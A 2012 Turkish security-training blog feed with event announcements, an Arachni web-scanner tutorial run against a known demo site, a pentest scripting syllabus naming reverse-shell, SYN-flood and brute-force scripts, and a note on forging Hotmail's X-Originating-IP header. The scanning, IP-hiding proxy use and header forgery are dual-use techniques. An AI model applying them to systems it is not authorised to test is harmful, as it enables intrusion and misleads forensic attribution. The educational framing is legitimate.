Siber Güvenlik Konferansı, 6 Kasım 2012  tarihinde TÜBİTAK Başkanlık Binası Feza Gürsey Salonu, Tunus Cad. No:80 Kavaklıdere / Ankara  adresinde gerçekleştirilecektir.

Katılım Şartları
Konferans, kayıt olan herkese açık ve ücretsizdir. Kayıtlar http://siberguvenlik.eventbrite.com adresi kullanılarak yapılmaktadır.

Sınırlı sayıda kontenjan bulunmakta olup kayıt ve kontenjan konusunda öncelik kamu kurum çalışanlarına aittir. Kayıt konusunda problem yaşayanlar veya kurum adına toplu katılım gerçekleştirmek isteyenler bilgi@siberguvenlik.org’a  e-posta gönderebilirler.

Konferans Hedef Kitlesi
Siber Güvenlik Konferansı, özelde bilgi güvenliği yöneticileri, ağ ve sistemi güvenliği departmanı çalışanları, güvenlik ürünü satış ve pazarlamacıları, ethical hacking konusu meraklıları, adli bilişim analizi konusu meraklıları, yazılım uzmanları, siber güvenlik uzmanlarına yönelik olmakla birlikte bilgi güvenliği ve alt dallarına meraklı herkesin ilgiyle izleyeceği bir etkinliktir.

Konferans Programı
Güncel konferans programı http://www.siberguvenlik.org/p/konferans-programi.html adresinden erişilebilir.

Sponsorlar
Siber güvenlik konferansı 2012 aşağıdaki sponsorların desteğiyle düzenlenmektedir.

Palo Alto Networks, Tubitak  BİLGEM Siber Güvenlik Enstitüsü, SYMTÜRK, Microsoft Türkiye, EnderSYS, BGAPro Bilişim Güvenliği


Siber Güvenlik Konferansı Düzenleme Kurulu
bilgi@siberguvenlik.org
www.siberguvenlik.org
+90 216 474 0038

Bilgi Güvenliğinde Sızma Testleri Etkinlik Sunumları

$
0
0
BGA Bilgi Güvenliği olarak üç farklı konu ve sunumla katıldığımız NetSec Ağ ve Bilgi Güvenliği Topluluğu 20 Ekim etkinliğine ait sunum dosyalarına aşağıdaki linklerden erişim sağlanabilir.

Sunumlar:

Fotoğraflar:

Etkinlikteki sunulan diğer konular ve fotoğraflara http://www.netsectr.org/2012/10/20-ekim-2012-bilgi-guvenliginde-szma.html adresinden erişim sağlanabilir.

Siber Güvenlik Konferansı'12 Sunum ve Fotoğrafları

$
0
0

Web Uygulama Güvenliği Değerlendirme Sınavı

$
0
0
Bilgi Güvenliği AKADEMİSİ olarak temel web uygulama güvenlik bilgisini ölçme amaçlı hazırladığımız değerlendirme sınavına http://www.bga.com.tr/sinav/webappsecquiz/
adresinden erişim sağlanabilir.

Sınav teknik içerik barındırması nedeniyle bazı sorularda doğru olarak belirlenen şık tartışmalı olabilir. Geri bildirimler için bilgi@bga.com.tr adresine e-posta gönderebilirsiniz.

Web Uygulama Güvenlik Testlerinde Arachni Kullanımı

$
0
0
Arachni, açık kaynak kodlu olarak geliştirilen oldukça başarılı bir web güvenliği zaafiyet tarama yazılımıdır. Bu blog girdisinde genel hatlarıyla Arachni yazılımının kurulumu ve güvenlik testlerinde kullanımına değinilecektir.

Arachni Kurulumu

root@bt:~# wget http://downloads.arachni-scanner.com/arachni-0.4.1.2-linux-i386.tar.gz
--2012-11-17 18:08:43--  http://downloads.arachni-scanner.com/arachni-0.4.1.2-linux-i386.tar.gz
Resolving downloads.arachni-scanner.com... 74.220.200.193
Connecting to downloads.arachni-scanner.com|74.220.200.193|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30816506 (29M) [application/x-gzip]
Saving to: `arachni-0.4.1.2-linux-i386.tar.gz'

100%[======================================>] 30,816,506   246K/s   in 5m 8s 

2012-11-17 18:13:54 (97.7 KB/s) - `arachni-0.4.1.2-linux-i386.tar.gz' saved [30816506/30816506]
Sıkıştırılmış dosyayı açıyoruz:

root@bt:~# tar -zxvf arachni-0.4.1.2-linux-i386.tar.gz
…....
…....
arachni-0.4.1.2/usr/lib/libsqlite3.so.0.8.6
arachni-0.4.1.2/usr/lib/libxml2.so.2.8.0
arachni-0.4.1.2/usr/lib/xml2Conf.sh
arachni-0.4.1.2/usr/info/
arachni-0.4.1.2/usr/man/

Arachni dizinine girip mevcut çalıştrabileceğimiz başlangıç scripler;

root@bt:~/arachni-0.4.1.2/bin# ls -l
total 44
-rwxrwxr-x 1 postgres postgres  346 2012-11-04 17:28 arachni
-rwxrwxr-x 1 postgres postgres  354 2012-11-04 17:28 arachni_console
-rwxrwxr-x 1 postgres postgres  350 2012-11-04 17:28 arachni_rpc
-rwxrwxr-x 1 postgres postgres  351 2012-11-04 17:28 arachni_rpcd
-rwxrwxr-x 1 postgres postgres  359 2012-11-04 17:28 arachni_rpcd_monitor
-rwxrwxr-x 1 postgres postgres  353 2012-11-04 17:28 arachni_script
-rwxrwxr-x 1 postgres postgres  401 2012-11-04 17:28 arachni_shell
-rwxrwxr-x 1 postgres postgres  371 2012-11-04 17:28 arachni_test
-rwxrwxr-x 1 postgres postgres  350 2012-11-04 17:28 arachni_web
-rwxrwxr-x 1 postgres postgres  360 2012-11-04 17:28 arachni_web_autostart
-rw-rw-r-- 1 postgres postgres 1370 2012-11-04 17:28 readlink_f.sh
Şimdi Arachni aracının komut satırından basit kullanımına değinelim:

root@bt:~/arachni-0.4.1.2/bin# ./arachni http://testasp.vulnweb.com/ --only-positives
WARNING: Nokogiri was built against LibXML version 2.8.0, but has dynamically loaded 2.7.6
Arachni - Web Application Security Scanner Framework v0.4.1.2
   Author: Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>

           (With the support of the community and the Arachni Team.)

   Website:       http://arachni-scanner.com
   Documentation: http://arachni-scanner.com/wiki


 [~] No modules were specified.
 [~]  -> Will run all mods.

 [~] No audit options were specified.
 [~]  -> Will audit links, forms and cookies.
[+] Insecure cookies: In cookie var 'ASPSESSIONIDCQBSSTSR' ( http://testasp.vulnweb.com/ )
 [+] HttpOnly cookies: In cookie var 'ASPSESSIONIDCQBSSTSR' ( http://testasp.vulnweb.com/ )
 [+]  Interesting responses: In server ( http://testasp.vulnweb.com/Templatize.asp?item=html%2Fabout.html6affdae3b3c1aa6aa7689e9b6a7b3225a636aa1ac0025f490cca1285ceaf1487 )
 [+]  Interesting responses: Found an interesting response -- Code: 500.
 [+]  Interesting responses: In server ( http://testasp.vulnweb.com/showforum.asp?id=06affdae3b3c1aa6aa7689e9b6a7b3225a636aa1ac0025f490cca1285ceaf1487 )
 [+] Interesting responses: Found an interesting response -- Code: 500.

 [+]  Interesting responses: Found an interesting response -- Code: 500.
 [+] SQLInjection: In link var 'id' ( http://testasp.vulnweb.com/showforum.asp?id=0 )
 [+]  SQLInjection: In link var 'id' ( http://testasp.vulnweb.com/showforum.asp?id=0 )
 [+] Allowed methods: In server ( http://testasp.vulnweb.com/ )
 [+] Allowed methods: OPTIONS, TRACE, GET, HEAD
 [+] Interesting responses: In server ( http://testasp.vulnweb.com/cgi-bin/ )
 [+] Interesting responses: Found an interesting response -- Code: 403.
 [+] CommonFiles: Found robots.txt at http://testasp.vulnweb.com/robots.txt

Görüldüğü gibi sistem üzerinde mevcut açıklıkları bulmaya başladı.--only-positives parametresini kullanmamızın sebebi yalnızca bulguları ekrana yansıtmasını sağlamak içindir. Bu şekilde basit kullanımda arachni ön tanımlı  tüm eklenti ve modülleri hedef sistem üzerinde çalıştıracaktır.
Arachni ile yalnız istediğiniz açıklıkları da taratmanız mümkün. Bunun için öncelikle arachni aracının desdeklediği modülleri görelim.

root@bt:~/arachni-0.4.1.2/bin# ./arachni --lsmod

komutu verildikten sonra (space + enter) tuş kombinasyonu ile bir sonraki modüller görülebilir.

Arachni’nin tarayabildiği açıklık modüllerine örnek olarak;
  • code_injection_timing
  • xss_tag (html tag’lerdeki xss’ler)
  • xss_event(html event nesnelerindeki xss’ler)
  • os_cmd_injection_timing
  • session_fixation
  • rfi (remote file inclusion)
  • xss_path (dizin enjeksiyonu için xss)
  • sqli_blind_rdiff (kör(blind) sql enjeksiyonu)
  • os_cmd_injection (os komut enjeksiyonu)
  • sqli_blind_timing (Blind(timing) sql injection)
  • xss(cross site scripting)
  • code_injection
  • sqli
  • csrf
  • backdoors
  • backup_files
  • common_files
  • directory_listing
  • unencrypted_password_forms
  • insecure_cookies
Ve daha bir çok tarama modülüne sahiptir.Yalnızca sql injection ve xss açıklarını bulmak istediğimizi varsayalım;


root@bt:~/arachni-0.4.1.2/bin# ./arachni http://testasp.vulnweb.com/ --only-positives --mods=sqli*,xss*

  [+] SQLInjection: In link var 'id' ( http://testasp.vulnweb.com/showforum.asp?id=0 )
  [+]SQLInjection: In form var 'tfSearch' ( http://testasp.vulnweb.com/Search.asp )
  [+] XSS: In form var 'tfSearch' ( http://testasp.vulnweb.com/Search.asp )
  [+] SQLInjection: In link var 'tfSearch' ( http://testasp.vulnweb.com/Search.asp?tfSearch= )
  [+]XSS: In link var 'tfSearch' ( http://testasp.vulnweb.com/Search.asp?tfSearch= )
  [+]SQLInjection: In link var 'id' ( http://testasp.vulnweb.com/showthread.asp?id=0 )

Burada sqli* ve xss* olarak kullanmamızın sebebi sqli ve xss ile başlayan tüm modülleri çalıtırmasını istememiz.

Bulguların çıktısının rapor olarak yazılması istenirsa arachni bu durumda çeşitli formatları(html,xml,txt,afr,json,yaml,stdout vs.) desteklemektedir.Afr uzantısı arachni aracının kendi uzantı formatıdır.

Bu uzantıda kaydedilen sonuclar daha sonra istenilen bir uzantıya dönüştürülebilir, örnek olarak .afr uzantısından .html uzantısında rapor alalım;

root@bt:~/arachni-0.4.1.2/bin# ./arachni --repload=sonuc.afr --report=html:output=sonuc.html


Sonuçları html olarak kaydetmek için;

root@bt:~/arachni-0.4.1.2/bin# ./arachni http://testasp.vulnweb.com/ --only-positives --mods=sqli*,xss* --report=html:output=sonuc.html

şeklinde bir komut kullanılabilir.

Gerçek IP adresinizin görünmemesi için hedef sunucu proxy üzerinden taranmak istenirse;
root@bt:~/arachni-0.4.1.2/bin# ./arachni --proxy=85.238.102.248:8080 --proxy-type=http http://testasp.vulnweb.com/

Arachni ile kullanıcı adı parola korumalı uygulamalarda test edilebilir.Bunun için cookie dosyası arachni’ye verilmelidir.

Öncelikle curl ile hedef sunucuya mevcut kullanıcı adı ve şifresi ile bağlanıp bir cookie alıyoruz.

root@bt:~# curl -c cookies.txt -d "user_name=admin&user_pass=123abc" http://www.testpage.com/login.php

Ardından oluşturduğumuz cookie.txt dosyasını arachniye veriyoruz;

root@bt:~/arachni-0.4.1.2/bin# ./arachni http://www.testpage.com/login.php --cookie-jar=’cookie.txt’
Bu şekilde parola korumalı web uygulamalarıda test edilebilir.

Arachni çalışırken gönderilen isteklere dönen cevapları yorumlayarak kendi kendini eğitme özelliğine de sahiptir.

Arachni web arayüzünden kullanımı için öncelikle ;

root@bt:~/arachni-0.4.1.2/bin# ./arachni_rpcd &
[1] 22016

[2012-11-17T19:43:03.562514 #22042]  INFO -- System: RPC Server started.
[2012-11-17T19:43:03.562674 #22038]  INFO -- System: Listening on localhost:24055
[2012-11-17T19:43:03.563047 #22042]  INFO -- System: Listening on localhost:18158
[2012-11-17T19:43:03.575103 #22016]  INFO -- System: RPC Server started.
[2012-11-17T19:43:03.578151 #22016]  INFO -- System: Listening on localhost:7331


komutu ve ardından;

root@bt:~/arachni-0.4.1.2/bin# ./arachni_web
WARNING: Nokogiri was built against LibXML version 2.8.0, but has dynamically loaded 2.7.6
== Sinatra/1.3.3 has taken the stage on 4567 for development with backup from Thin
>> Thin web server (v1.5.0 codename Knife)
>> Maximum connections set to 1024
>> Listening on 0.0.0.0:4567, CTRL+C to stop

komutu verilir.Artık arachni web arayüzüne 4567 portu üzerinden erişebiliriz.




Bir önceki komutumuzda 7331 portunda bir dispatcher dinleme konumundaydı.Add diyerek dispatcher ekleyip start a new scan ile taramaya geçebiliriz.








İlgili arabirimde Modules/Plugins menüleri altından çalıştırılması istenen modül ve eklentiler seçilebilir. Ayrıca tarama esnasında kullanılacak tüm ayarlar settings menüsü altından girilebilir.(Eş zamanlı http istek limiti,Proxy adresi user ve parolası,cookie jar dosyası,cookie ve header’ların denetlenip denetlenmeyecegi vs.)

Web arayüzünün daha kolay başlatılması için istenirse;

root@bt:~/arachni-0.4.1.2/bin# ./arachni_web_autostart

komutuda kullanılabilir.Bu komut ile web browser otomatik olarak web arayüzü açacaktır.

Internete açık bir sunucu üzerinden arachni aracını çalıştıracaksak web arayüzüne erişimin şifreli olmasını isteyebiliriz. Aksi durumda bu port üzerinden tüm internet kullanıcıları arachni uygulamasına erişebiliyor olacaktır. Bunun için basic web authenticate metodu ile web arayüzüne şifre konulması için şu komut verilmesi yeterli olacaktır;
root@bt:~/arachni-0.4.1.2/bin# ./arachni_web --username bga --password bgaP35!
WARNING: Nokogiri was built against LibXML version 2.8.0, but has dynamically loaded 2.7.6
== Sinatra/1.3.3 has taken the stage on 4567 for development with backup from Thin
>> Thin web server (v1.5.0 codename Knife)
>> Maximum connections set to 1024
>> Listening on 0.0.0.0:4567, CTRL+C to stop
Artık web arayüzünden http://192.168.1.102:4567 adresine bağlanmak istediğimizde bir parola koruması ile karşılaşacağız;

2012 Yılı Türkiye Siber Tehditler Sıralaması

$
0
0
Bilgi Güvenliği AKADEMİSİ olarak her yıl düzenli gerçekleştirdiğimiz Türkiye Siber Tehditler Sıralaması Anketi'nin 2012 yılında daha önceki yıllara oranla çok daha geniş bir katılımla tamamladık.
Toplamda 1476 farklı firma, 1600 kişinin katıldığı anketin sonuçları 2011 yılıyla benzerlik göstermekte.


ISO27001 ve ISO22301 İş Sürekliliği Yönetim Sistemi Eğitimleri

Sızma Test Uzmanları için Pratik Programlama Eğitimi

$
0
0
Scripting For Pentester (Sızma Test Uzmanları için Pratik Programlama Eğitimi)
sızma testleri konusunda uzmanlaşmak isteyen güvenlik uzmanlarına yönelik  standart yazılımlara bağımlı kalmadan ihtiyaca yönelik betiklerin, yazılımların geliştirilebilmesini amaçlayan bir eğitimdir.

Eğitim süresince gerçek hayattan sızma testlerinde ihtiyaç duyulan ve kullanılan örnekler farklı betik dilleriyle pratik olarak uygulanacaktır.

Eğitim Linux bash, windows poweshell ve python gibi betik progralama amaçlı sık kullanılan Nmap NSE, Metasploit modülü geliştirme gibi güncel güvenlik yazılımlarına modül, eklenti geliştirmeyi de içermektedir.


Eğitim için temel şart

Temel programlama bilgisine sahip olma, Temel Linux/Windows bilgisi

Eğitim Süresi: 6 gün

Online iki gün: Eğitime katılmadan önce bash programlama ve Python programlama ipuçlarını ve örneklerini içeren ön hazırlık evresi. Bu aşamayı tamamlamadan yerinde eğitime katılım sağlanamaz.

  • Bash Script - 1. Gun
    • Kabuk ve Komutların Yorumlanmasi
    • Temel Linux Komutlar
    • Değişken Tanımlamaları
    • Kontrol Yapiları
      • If else
      • Switch case
    • Döngüler
      • For
      • While
    • Komut Satırı Argüman Kullanımı
    • Matematiksel İşlemler
    • Dosya işlemleri
    • Matematiksel Işlemler
    • Fonksiyon Tanımlamaları
    • Hata Ayıklama
    • Ornek Sızma Test Senaryoları
    • Bash kullanarak otomatik WEP/WPA kırma betiğin geliştirilmesi
    • Bash ve Netcat kullanarak TCP port tarama betiğinin geliştirilmesi
    • Bash kullanarak reverse shell betiğinin geliştirilmesi  
  • Python - 2. Gün
    • Interaktif Python Kabugu
    • Degisken Tanımlamaları
    • Kontrol Yapilaıi
      • If else
      • Switch case
    • Döngüler
      • For
      • While
    • Komut Satırı Argüman Kullanımı
    • Matematiksel İşlemler
    • Dosya işlemleri
    • Fonksiyon Tanımlamalar
    • Sinif Tanımlamaları
    • Hata Yakalama
    • Ag Islemleri
    • Scapy Programlama
      • Scapy kullanarak SYN flood saldırısı betiğinin geliştirilmesi
      • Scapy kullanarak basit sniffer geliştirilmesi
      • Scapy kullanarak basit protokol tabanlı brute force betiğinin geliştirilmesi
      • Scapy kullanarak ssh, telnet brute force betiğinin geliştirilmesi
    • Ornek Sizma Testi Senaryolarinin Gerceklenmesi
  • 3. Gün - Sızma Test Araçlarına Özellik Ekleme
    • Nmap
      • Temel Nmap Komut Satırı Kullanımı
      • Nmap Sonuçlarının İhtiyaca Göre Yorumlanması
      • Nmap  NSE Betikleri
      • Ornek Nmap NSE Betiginin Gelistirilmesi
    • Nessus
      • Temel Nessus Kullanimi
      • Komut Satiri Nessus kullanimi
      • Nessus Sonuclarinin Yorumlanmasi
      • NASL Kullanarak Örnek Nessus Eklentisi Geliştirme
    • Metasploit
      • Temel Metasploit Kullanimi
      • Komut Satırından Metasploit Kullanımı
      • Metasploit Sonuclarinin Veritabanina Aktarilmasi
      • Metasploit Aux Modülü Geliştirme
    • Netcat, Ncat kullanarak çeşitli ağ operasyon işlemleri
    • Medusa, Hydra
      • Medusa/Hydra’nın desteklemedigi bi protokol icin brute force modülü yazma
    • Google Search Kullanımı

  • 4. Gun - Sızma Testi Senaryolari ve Betik Programlama
    • Waftester - Web Application Firewall keşif betiği
    • Ips tester - IPS Test ve keşif betiği geliştirme
    • Firewalltester - Güvenlik duvarı test ve keşif aracı geliştirme
    • Ic agdan dis aga dogru acik portlari bulma
    • Agdaki acik bilgisayarlarin ping ile bulunmasi
    • Agdaki bilgisayarlara ait acik port bilgisinin bulunmasi
    • Agdaki 80,443 portlari acik olan sunucularin ekranlarinin firefox ile acilmasi
    • Agdaki 80,443 portlari acik olan sunuculardaki web sayfasinda icerisinde  belirli string geçen ip adreslerinin bulunması
    • Reverse DNS kayitlarina sahip sunucularin ip ve domain isimleri ile listelenmesi
    • Agdaki acik bilgisayarlarin 445 portu acik bilgisayarlardaki paylasimlarin listelenmesi
    • Agdaki acik sunucularin belirli servisi acik olanlarina brute force denenmesi
    • Port tarama betiginin gelistirilmesi
    • Verilen domaine ait ip adres araliginin bulunmasi ve acik ip adreslerinin bulunup bu ip adresleri uzerindeki acik servislerin belirlenmesi
    • Verilen domaine ait alt domainlerin google'da bulunmasi
    • Ornek web sayfasindaki linklere brute force ile iceriklerinde belirli string içerenlerin belirlenmesi
    • Nessus raporlarinin yorumlanmasi
    • Verilen domaine ait DNS ve SMTP sunucularin ve bu sunuculara ait port durumlarinin belirlenmesi

Hotmail Eposta Gönderici IP Saklama (X-Originating-IP Sahteciliği)

$
0
0
E-posta analizlerinde en önemli konu gönderilen/alınan e-postaya ait başlık bilgilerinin analiz edilmesidir. SMTP başlık bilgisinde bulunan Received-by satırı maili kimin gönderdiği konusunda yeterli detay vermektedir. Bazı e-posta hizmet sağlayıcıları kullanıcıların ip adresini saklamak için değişik yöntemler kullanır, mesela Gmail üzerinden gönderilen e-postaları geriye doğru SMTP başlık bilgilerinden takip etmek mümkün gözükmemektedir.

Benzeri şekilde eğer kişi e-postayı Outlook, Thunderbird gibi e-posta istemcisi kullanarak değil de webmail üzerinden gönderdiyse yine Received-By satırları yeteri kadar bilgi vermeyebilir. Bu gibi durumlarda webmailin eklediği X-Originating-Ip başlık bilgisi incelebilir.

Örnek verilecek olursa Hotmail web arabirimi kullanılarak gönderilen e-postalara browser üzerinden maili gönderene ait ip adresi bilgisini "X-Originating-IP" başlık satırı kullanarak eklemektedir. Çoğu adli bilişim analiz çalışmasında bu başlık bilgilerine güvenilerek işlem yapıldığı olmuştur.
Oysa X- ile başlayan başlık bilgileri ara sistemler tarafından eklenen ve kolaylıkla değiştirilen bilgilerdir.

Örnek bir Hotmail kullanıcısına ait e-posta başlık bilgisi:

----
X-Originating-IP 'de Gözüken IP Adresini Değiştirme






Benzeri şekilde araya girme işlemi yapmadan doğrudan SMTP bağlantısı kurularak da aynı sahte başlık bilgisi eklenebilir.



Hotmail bu başlık bilgisini kabul ederek gönderilen kişi tarafında yapılacak analizlerde sahte başlık değerlerini eklemektedir.



Viewing all 331 articles
Browse latest View live